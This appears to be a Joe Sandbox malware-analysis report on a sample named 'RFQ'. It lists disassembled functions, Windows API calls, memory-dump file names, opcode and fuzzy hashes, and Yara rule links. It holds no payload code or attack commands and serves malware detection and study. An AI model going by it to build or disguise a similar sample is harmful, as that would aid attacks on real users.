                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 59ea53b6ac69e061e67a2d92c22e8098330ce80e65e94549fae32602b037e753
                                                                                                                                                    • Instruction ID: 7e3f3c340358aab57c66eef6fb7c34dc81e7ad32d4d4369a61920d529e38d68d
                                                                                                                                                    • Opcode Fuzzy Hash: 59ea53b6ac69e061e67a2d92c22e8098330ce80e65e94549fae32602b037e753
                                                                                                                                                    • Instruction Fuzzy Hash: 6A71E8709043858FEB25CF14C44576ABBD0FB52314F088A6AE8859B2D2E77D9885CB46
                                                                                                                                                    Function 00752957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __flush.LIBCMT ref: 00752A0B
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flush__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4101623367-0
                                                                                                                                                    • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                    • Instruction ID: 86a06aacd98d747138f6803676088927cc685aca2a4eb06da0c4c67d0517c7a8
                                                                                                                                                    • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                                    • Instruction Fuzzy Hash: 5F41BA717007069FDF288E65C8815EE77A6AF46362F24C52DEC45D7242EBF8ED4A8740
                                                                                                                                                    Function 0074ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction ID: 07f22658f8e6542bc470b87c177cae7e8c03bc043977ce61b93ba7f80dfa4730
                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction Fuzzy Hash: D331C174B00106DBD718DF58C480A69FBA6FF49360B6486A5E40ACB266DB39EDC1CFD0
                                                                                                                                                    Function 0079040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 650f0660e669644c8e8019b5c0c52161409a68087c5cd60b2d2b9fe1ea2d8273
                                                                                                                                                    • Instruction ID: 518c57ad5a133276d3f4c4892876bb72bd7c79f92e781aad6f1d3007b3b70e0e
                                                                                                                                                    • Opcode Fuzzy Hash: 650f0660e669644c8e8019b5c0c52161409a68087c5cd60b2d2b9fe1ea2d8273
                                                                                                                                                    • Instruction Fuzzy Hash: 0D31A275614924DFCF01EF10E094A6E77B0FF49320F21844AEA951B396D778A915CFD1
                                                                                                                                                    Function 007A9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 12ad8f5d65a6b17730cfbb68b13115f64b9a184399bcf545e3597f200d4647b9
                                                                                                                                                    • Instruction ID: b08e65da2ff1d8a207658c875ec89ee477a449e0d8139c4cef44626f64cce7a1
                                                                                                                                                    • Opcode Fuzzy Hash: 12ad8f5d65a6b17730cfbb68b13115f64b9a184399bcf545e3597f200d4647b9
                                                                                                                                                    • Instruction Fuzzy Hash: 2A413D74504651CFDB24DF14C484B1ABBE1BF85304F2989ACE9964B362C37AE895CF92
                                                                                                                                                    Function 007341A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00734214: FreeLibrary.KERNEL32(00000000,?), ref: 00734247
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007339FE,?,00000001), ref: 007341DB
                                                                                                                                                      • Part of subcall function 00734291: FreeLibrary.KERNEL32(00000000), ref: 007342C4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Free$Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2391024519-0
                                                                                                                                                    • Opcode ID: 0b71bb8959d89df399be10eb3dcfa52bc8491d216a41439404e9049232e30b83
                                                                                                                                                    • Instruction ID: 49e62691ee5f49639822662bc978d3dc5f1f353ae75c33bfcb218fe80227ef52
                                                                                                                                                    • Opcode Fuzzy Hash: 0b71bb8959d89df399be10eb3dcfa52bc8491d216a41439404e9049232e30b83
                                                                                                                                                    • Instruction Fuzzy Hash: D811AB71600305EAEF18BB74DC0AF9E77A5AF40700F108429F556B61C2DA79AA049B50
                                                                                                                                                    Function 007A9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 2c9f6708c4d92e6b370cec5ffb119abb09e2e00b7c0f224f1651efb417655800
                                                                                                                                                    • Instruction ID: 1c06b6f0fc7d53d34be23c0c9d231fffbade99a87996300db8b36ffd7bcf3be4
                                                                                                                                                    • Opcode Fuzzy Hash: 2c9f6708c4d92e6b370cec5ffb119abb09e2e00b7c0f224f1651efb417655800
                                                                                                                                                    • Instruction Fuzzy Hash: C7210570508601CFDB24DF68C448B1BBBE1BF85304F154A6CFA9A4B262D73AE855DF92
                                                                                                                                                    Function 0075AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___lock_fhandle.LIBCMT ref: 0075AFC0
                                                                                                                                                      • Part of subcall function 00757BDA: __getptd_noexit.LIBCMT ref: 00757BDA
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1144279405-0
                                                                                                                                                    • Opcode ID: 3d756b6fa4d8847d746b67b71d05609b69aa27cc7e32c6ab4dbe3cbe1cd20f7c
                                                                                                                                                    • Instruction ID: c5b67180bbc8dd39172884d1b5909a50ca94100872eca1c9865f77fbf7a5f7f8
                                                                                                                                                    • Opcode Fuzzy Hash: 3d756b6fa4d8847d746b67b71d05609b69aa27cc7e32c6ab4dbe3cbe1cd20f7c
                                                                                                                                                    • Instruction Fuzzy Hash: 44115EB2805614DBD7166FA4D84A7E97760AF41333F294250EC381B2E2D7FD9908DAA1
                                                                                                                                                    Function 007339DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                    • Instruction ID: 1fc82ecefe14bde22591cfd5f353c3a398e270c2e95e2b926b7be7c298b9e55c
                                                                                                                                                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                    • Instruction Fuzzy Hash: 0301867140010DEEDF05EF64C8818FEBB74AF11344F00C169B515971A6EA34AA49CF60
                                                                                                                                                    Function 00752AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 00752AED
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                                    • Opcode ID: 983b863705b3502684e82cae62836786458ea869f9df749bfd9b9907ab7d6400
                                                                                                                                                    • Instruction ID: dbc9e8c335c31709968d649a22f79ecab1cb68858fe817d356318df2c07c2215
                                                                                                                                                    • Opcode Fuzzy Hash: 983b863705b3502684e82cae62836786458ea869f9df749bfd9b9907ab7d6400
                                                                                                                                                    • Instruction Fuzzy Hash: 01F0C271500205EADF21AF748C0A7DF36A5BF01322F148419BC109B192D7FC8A5BDB91
                                                                                                                                                    Function 00734252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,007339FE,?,00000001), ref: 00734286
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 1832d3d8792dca412fdd3fee32b6e75770b3df6a75573d8f8f05d1756ed9cef7
                                                                                                                                                    • Instruction ID: 377b34ac86975a65cfff008ca70983885e7c11882f433b2d680b60d5e10b8413
                                                                                                                                                    • Opcode Fuzzy Hash: 1832d3d8792dca412fdd3fee32b6e75770b3df6a75573d8f8f05d1756ed9cef7
                                                                                                                                                    • Instruction Fuzzy Hash: 02F0A970404302DFDB388F64D884813BBE0BF003253208A3EF1C6A2622C37AA840DF40
                                                                                                                                                    Function 007340A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007340C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 82841172-0
                                                                                                                                                    • Opcode ID: 6bc6f19c9de2f70c42cbddb3b776bbaffbe89cd60ecb77a2eabf5a4df6dd68f4
                                                                                                                                                    • Instruction ID: e83cb67fe5a7916d2eda50a3cfb1db525db937e5fa1d65233c0c3caf078eb77e
                                                                                                                                                    • Opcode Fuzzy Hash: 6bc6f19c9de2f70c42cbddb3b776bbaffbe89cd60ecb77a2eabf5a4df6dd68f4
                                                                                                                                                    • Instruction Fuzzy Hash: 82E0CD365001285BC7119658CC46FEA779DDF886A0F054175F905D7244DD68AD818690
                                                                                                                                                    Function 01065F20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01065F31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction ID: 22f3701f06cb1cdb04703667788510719f60fcc39ed9b240faffd2a4ff8c1aa4
                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction Fuzzy Hash: FFE0BF7494410D9FDB00EFA4D94969E7BB4EF04301F1001A1FD0192281D63099508A62

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0079F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0079F87D
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079F8DC
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0079F919
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0079F940
                                                                                                                                                    • SendMessageW.USER32 ref: 0079F966
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0079F9D2
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0079F9F3
                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0079FA00
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079FA16
                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0079FA20
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0079FA4F
                                                                                                                                                    • SendMessageW.USER32 ref: 0079FA72
                                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0079E059), ref: 0079FB6F
                                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0079FB85
                                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0079FB96
                                                                                                                                                    • SetCapture.USER32(?), ref: 0079FB9F
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0079FC03
                                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0079FC0F
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0079FC29
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0079FC34
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079FC69
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0079FC76
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0079FCD8
                                                                                                                                                    • SendMessageW.USER32 ref: 0079FD02
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0079FD41
                                                                                                                                                    • SendMessageW.USER32 ref: 0079FD6C
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0079FD84
                                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0079FD8F
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079FDB0
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0079FDBD
                                                                                                                                                    • GetParent.USER32(?), ref: 0079FDD9
                                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0079FE3F
                                                                                                                                                    • SendMessageW.USER32 ref: 0079FE6F
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0079FEC5
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0079FEF1
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0079FF19
                                                                                                                                                    • SendMessageW.USER32 ref: 0079FF3C
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0079FF86
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0079FFB6
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 007A004B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                                    • API String ID: 2516578528-4164748364
                                                                                                                                                    • Opcode ID: 00894f9220d49c329883a63adab7281d8aaf07ceac120fef10430908cb4379ea
                                                                                                                                                    • Instruction ID: ab63853d3027e3d00b73b677569e32adc0623596935a7af7bcbfcc96f1e9aef9
                                                                                                                                                    • Opcode Fuzzy Hash: 00894f9220d49c329883a63adab7281d8aaf07ceac120fef10430908cb4379ea
                                                                                                                                                    • Instruction Fuzzy Hash: 1332CB70604245EFDB20CF28D884FAABBA8FF49358F144A29F695C72A1D739EC51CB51
                                                                                                                                                    Function 0079AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0079B1CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
